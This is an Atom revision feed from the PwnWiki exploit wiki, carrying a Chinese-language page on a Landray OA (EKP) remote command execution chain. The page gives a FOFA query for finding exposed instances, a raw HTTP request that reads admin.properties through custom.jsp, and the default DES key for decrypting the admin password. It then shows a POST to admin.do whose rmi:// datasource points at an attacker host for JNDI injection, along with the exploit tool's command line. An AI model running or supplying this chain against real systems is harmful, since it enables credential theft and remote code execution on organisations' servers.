<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E8%97%8D%E5%87%8COA_SSRF%2BJNDI%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>藍凌OA SSRF+JNDI遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E8%97%8D%E5%87%8COA_SSRF%2BJNDI%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E8%97%8D%E5%87%8COA_SSRF%2BJNDI%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T15:39:11Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E8%97%8D%E5%87%8COA_SSRF%2BJNDI%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2852&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==漏洞描述== 深圳市藍凌軟件股份有限公司數字OA(EKP)存在任意文件讀取漏洞。攻擊者可利用漏洞獲取敏感信息，讀取配置文件得到密...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E8%97%8D%E5%87%8COA_SSRF%2BJNDI%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2852&amp;oldid=prev"/>
		<updated>2021-05-14T01:42:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==漏洞描述== 深圳市藍凌軟件股份有限公司數字OA(EKP)存在任意文件讀取漏洞。攻擊者可利用漏洞獲取敏感信息，讀取配置文件得到密...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==漏洞描述==&lt;br /&gt;
深圳市藍凌軟件股份有限公司數字OA(EKP)存在任意文件讀取漏洞。攻擊者可利用漏洞獲取敏感信息，讀取配置文件得到密鑰後訪問 admin.do 即可利用 JNDI遠程命令執行獲取權限。&lt;br /&gt;
&lt;br /&gt;
==FOFA==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
app=&amp;quot;Landray-OA系统&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
利用 藍凌OA custom.jsp 任意文件讀取漏洞 讀取配置文件&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/WEB-INF/KmssConfig/admin.properties&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
發送請求包&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1&lt;br /&gt;
Host: &lt;br /&gt;
User-Agent: Go-http-client/1.1&lt;br /&gt;
Content-Length: 60&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Accept-Encoding: gzip&lt;br /&gt;
&lt;br /&gt;
var={&amp;quot;body&amp;quot;:{&amp;quot;file&amp;quot;:&amp;quot;/WEB-INF/KmssConfig/admin.properties&amp;quot;}}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
獲取password後，使用 DES方法 解密，默認密鑰為 kmssAdminKey&lt;br /&gt;
&lt;br /&gt;
訪問後台地址使用解密的密碼登錄&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://xxx.xxx.xxx.xxx/admin.do&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
使用工具執行命令：&lt;br /&gt;
&lt;br /&gt;
https://github.com/welk1n/JNDI-Injection-Exploit&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
運行工具監聽端口 ping dnslog測試 命令執行 (藍凌OA 默認使用的是 JDK 1.7)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /admin.do HTTP/1.1&lt;br /&gt;
Host: &lt;br /&gt;
Cookie: JSESSIONID=90EA764774514A566C480E9726BB3D3F; Hm_lvt_9838edd365000f753ebfdc508bf832d3=1620456866; Hm_lpvt_9838edd365000f753ebfdc508bf832d3=1620459967&lt;br /&gt;
Content-Length: 70&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Sec-Ch-Ua: &amp;quot; Not A;Brand&amp;quot;;v=&amp;quot;99&amp;quot;, &amp;quot;Chromium&amp;quot;;v=&amp;quot;90&amp;quot;, &amp;quot;Google Chrome&amp;quot;;v=&amp;quot;90&amp;quot;&lt;br /&gt;
Sec-Ch-Ua-Mobile: ?0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36&lt;br /&gt;
Origin: &lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
&lt;br /&gt;
method=testDbConn&amp;amp;datasource=rmi://xxx.xxx.xxx.xxx:1099/cbdsdg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==參考==&lt;br /&gt;
https://short.pwnwiki.org/?c=lgxx6L&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>